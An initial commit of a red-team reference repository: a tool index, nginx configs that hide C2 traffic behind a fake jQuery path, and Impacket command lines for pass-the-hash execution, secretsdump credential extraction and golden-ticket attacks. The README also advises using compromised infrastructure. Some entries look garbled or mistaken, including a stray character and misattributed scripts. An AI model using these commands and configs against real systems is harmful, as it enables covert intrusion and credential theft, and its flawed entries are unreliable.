Initial commit: GreySec red team tooling reference

README.md

@@ -0,0 +1,61 @@
+# GreySec Red Team Tools
+
+Documentation and operational notes for red team tooling used in GreySec engagements.
+
+## Core C2 Framework
+
+| Tool | Purpose | Key Modules |
+|------|---------|-------------|
+| Metasploit | Exploitation, pivoting | meterpreter, shell sessions |
+| Covenant | .NET C2 | Grunt, pivot listeners |
+| Sliver |golang C2 | beacons, session management |
+
+## Network Reconnaissance
+
+| Tool | Purpose |
+|------|---------|
+| nmap | Port scanning, service detection |
+| BloodHound | AD enumeration |
+| CrackMapExec | Network pentest automation |
+
+## Credential Attacks
+
+| Tool | Purpose |
+|------|---------|
+| Hashcat | Password cracking |
+| John | Credential attacks |
+| mimikatz | LSASS, credential extraction |
+
+## Lateral Movement
+
+| Tool | Purpose |
+|------|---------|
+| Impacket | SMB, WMI, DCOM execution |
+| Evil-WinRM | WinRM shell access |
+| psexec.py | Remote service execution |
+
+## Persistence
+
+| Tool | Purpose |
+|------|---------|
+| CrackMapExec | Admin persistence |
+| mimikatz | Credential dumping |
+| WCE | Windows credential editor |
+
+## Exfiltration
+
+| Tool | Purpose |
+|------|---------|
+| Cobalt Strike | Data exfiltration |
+| DNS-over-HTTPS tunnel | Covert exfil |
+| Staged payloads | Encrypted channels |
+
+## Operational Security
+
+- All tools must be run through a redirector (nginx/apache)
+- Use compromised infrastructure when possible
+- OPSEC-check before every action
+
+## Setup
+
+See individual tool directories for installation and configuration.

c2-redirectors.md

@@ -0,0 +1,80 @@
+# C2 Redirectors (nginx)
+
+## Purpose
+
+Redirectors proxy C2 traffic through legitimate-looking infrastructure to hide the actual C2 server.
+
+## Setup (nginx on Debian/Ubuntu)
+
+```bash
+# Install
+apt install nginx openssl
+
+# For HTTPS redirectors, get a cert:
+certbot --nginx -d redirector.example.com
+```
+
+## HTTP Redirector Config
+
+```nginx
+server {
+    listen 80;
+    server_name redirector.example.com;
+    
+    location / {
+        return 301 https://legitimate-site.com$request_uri;
+    }
+}
+
+server {
+    listen 443 ssl;
+    server_name redirector.example.com;
+    
+    ssl_certificate /etc/letsencrypt/live/redirector.example.com/fullchain.pem;
+    ssl_certificate_key /etc/letsencrypt/live/redirector.example.com/privkey.pem;
+    
+    location /static {
+        proxy_pass https://legitimate-site.com;
+        proxy_set_header Host legitimate-site.com;
+    }
+    
+    # C2 traffic goes to actual C2
+    location /jquery-3.6.0.min.js {
+        proxy_pass http://10.0.0.5:8080;
+    }
+}
+```
+
+## Cobalt Strike Redirector
+
+```nginx
+# For Cobalt Strike C2, route traffic based on URI
+location /jquery-3.6.0.min.js {
+    proxy_pass http://c2-server:80;
+    proxy_set_header Host staging.hoolulu.com;
+}
+```
+
+## Sliver Redirector
+
+```nginx
+# Sliver uses HTTPS with specific paths
+location /api/v2/status {
+    proxy_pass http://sliver-server:443;
+}
+```
+
+## DNS Redirector (for DNS C2)
+
+```bash
+# Setup DNS with dnsmasq
+echo "A record pointing to your C2 IP" >> /etc/dnsmasq.d/c2.conf
+systemctl restart dnsmasq
+```
+
+## Operational Notes
+
+- Use CDN domains when possible (CloudFlare, Akamai)
+- Separate redirectors per operation
+- Log everything for attribution if needed
+- Test redirects before engagement

impacket-reference.md

@@ -0,0 +1,71 @@
+# Impacket Usage Reference
+
+## Overview
+
+Impacket is a collection of Python classes for working with network protocols. Core tool for Windows pentesting.
+
+## Installation
+
+```bash
+pip install impacket
+# Or from source:
+git clone https://github.com/fortra/impacket
+cd impacket && pip install .
+```
+
+## Key Scripts
+
+### Remote Execution
+
+```bash
+# psexec.py - Pass-the-Hash
+python3 psexec.py DOMAIN/user@target.lan -hashes lm:ntlm
+
+# wmiexec.py - Stealth WMI exec
+python3 wmiexec.py DOMAIN/user@target.lan -hashes lm:ntlm
+
+# atexec.py - Scheduled task exec
+python3 atexec.py DOMAIN/user@target.lan -hashes lm:ntlm
+```
+
+### Credential Extraction
+
+```bash
+# secretsdump.py - NTDS.dit extraction
+python3 secretsdump.py DOMAIN/user@target.lan -hashes lm:ntlm
+
+# mimikatz.py - Remote mimikatz
+python3 mimikatz.py DOMAIN/user@target.lan -hashes lm:ntlm
+```
+
+### Kerberos Attacks
+
+```bash
+# getTGT.py - Ticket extraction
+python3 getTGT.py DOMAIN/user:password
+
+# goldenPac.py - Golden ticket + auto-exec
+python3 goldenPac.py DOMAIN/user@target.lan
+```
+
+### Network Discovery
+
+```bash
+# smbclient.py - Anonymous SMB share browsing
+python3 smbclient.py DOMAIN/user@target.lan
+
+# rpcclient.py - RPC bind蔷
+python3 rpcclient.py target.lan -N
+```
+
+## OPSEC Notes
+
+- wmiExec leaves fewer artifacts than psexec
+- Use -dc-ip for Kerberoasting
+- secretsdump requires domain admin or NTDS.dit access
+- Always check firewall rules before port scanning
+
+## GreySec Engagement Notes
+
+Used in: `exploit-pipeline` for lateral movement automation.
+See: https://gsfiles.tail57cd.ts.net/greysec/exploit-pipeline